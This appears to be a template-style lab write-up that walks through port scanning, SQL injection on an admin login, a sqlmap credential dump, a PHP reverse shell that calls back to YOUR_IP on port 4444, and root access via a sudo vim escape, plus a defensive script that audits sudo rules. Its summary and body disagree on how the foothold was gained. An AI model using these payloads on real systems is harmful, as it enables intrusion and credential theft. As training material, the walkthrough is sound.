CyberTask - ChallengeName Writeup

December 25, 2024 · YourName

Quick Info

Property Value
Platform CyberTask
Category Cyber Range Lab
Difficulty Medium
IP 10.10.10.xxx
Techniques SQLi, SSTI, Sudo Abuse

TL;DR Summary

  1. Found web app on port 80 with SQL injection
  2. Extracted credentials from database
  3. SSH access as user www-data
  4. Privilege escalation via sudo misconfiguration

Reconnaissance

What ports are open?

Running Nmap to discover open ports:

nmap -sCV -p- -oN nmap/full.txt 10.10.10.xxx

Results:

nmap/full.txt
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1
80/tcp open  http    Apache 2.4.41

Port 80 is open — let’s enumerate the web application first.

Enumeration

Directory Bruteforce

gobuster dir -u http://10.10.10.xxx -w /usr/share/wordlists/dirb/common.txt

Found directories:

  • /admin — Login panel
  • /uploads — File upload functionality
  • /api — REST API endpoints

What technology is the website using?

Always check the technology stack before attacking!

Using whatweb:

whatweb http://10.10.10.xxx

Output:

Apache 2.4.41 | PHP 7.4 | Bootstrap

Exploitation

How to exploit the SQL Injection?

Found SQLi in login form at /admin:

' OR 1=1-- -

Only use these techniques on CyberTask labs or systems you own!

Step 1: Confirm SQLi

sqlmap -u "http://10.10.10.xxx/admin" --forms --dbs

Step 2: Dump Credentials

sqlmap -u "http://10.10.10.xxx/admin" --forms -D webapp -T users --dump

Found credentials:

Username Password
admin Sup3rS3cr3t!
john password123

Getting Reverse Shell

Upload PHP reverse shell:

shell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
?>

Start listener:

nc -lvnp 4444

Pro Tip: Always upgrade your shell immediately after connection!

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg

Privilege Escalation

How to escalate to root?

Check sudo permissions:

sudo -l

Output:

User www-data may run the following commands:
    (ALL) NOPASSWD: /usr/bin/env
    (ALL) NOPASSWD: /usr/bin/vim

Found sudo misconfiguration! Check GTFOBins for exploitation.

Root via vim

sudo vim -c ':!/bin/bash'

Got root! 🎉

root@machine:~# whoami
root
root@machine:~# cat /root/root.txt
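
The sudo -l check above, seen from the administrator's side: an added example (not part of the original writeup) that parses such a listing and flags rules that amount to a root shell. The binary list and the apachectl rule are assumptions constructed for illustration.

```python
import re

# Illustrative subset of binaries with documented shell escapes (the kind of
# entry GTFOBins lists). Assumption of this example, not a complete catalogue.
SHELL_ESCAPE_BINARIES = {"env", "vim", "vi", "less", "find", "awk", "perl",
                         "python3", "tar", "bash", "sh"}

# One rule line of `sudo -l`, e.g. "    (ALL) NOPASSWD: /usr/bin/vim"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# The page's sudo -l output plus one constructed low-risk rule for contrast.
SAMPLE_SUDO_L = """\
User www-data may run the following commands:
    (ALL) NOPASSWD: /usr/bin/env
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/sbin/apachectl graceful
"""

def audit_sudo_listing(text):
    """Return findings for sudo rules that amount to a root shell."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header or unrelated line
        runas = m.group("runas").split(":")[0].strip()
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            path = cmd.split()[0]
            name = path.rsplit("/", 1)[-1]
            if path == "ALL":
                reasons = ["any command allowed"]
            elif name in SHELL_ESCAPE_BINARIES:
                # Name match only: arguments are not analysed, so treat
                # a hit as a prompt for manual review of the rule.
                reasons = ["binary can spawn a shell"]
            else:
                continue
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            if runas in ("ALL", "root"):
                reasons.append("can run as root")
            findings.append({"command": path, "runas": runas, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE_SUDO_L):
        print(f"{f['command']} (as {f['runas']}): " + "; ".join(f["reasons"]))
```

Both rules from the lab output are flagged, while the constructed apachectl rule is not.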

Flags

Flag Value
User CTF{user_flag_here}
Root CTF{root_flag_here}

Lessons Learned

Key Takeaways

  1. Always enumerate thoroughly — Don’t rush to exploitation
  2. Check sudo permissions — Common misconfiguration vector
  3. Use GTFOBins — Great resource for privilege escalation

Tools Used

  • nmap — Port scanning
  • gobuster — Directory bruteforce
  • sqlmap — SQL injection automation
  • burpsuite — Web proxy

FAQ

What is the initial foothold?

SQL injection in the admin login panel leads to credential disclosure, which allows SSH access.

How long did this lab take?

Approximately 2-3 hours for initial foothold, 30 minutes for privilege escalation.

Can this be done without sqlmap?

Yes! Manual SQLi exploitation is possible using UNION-based injection.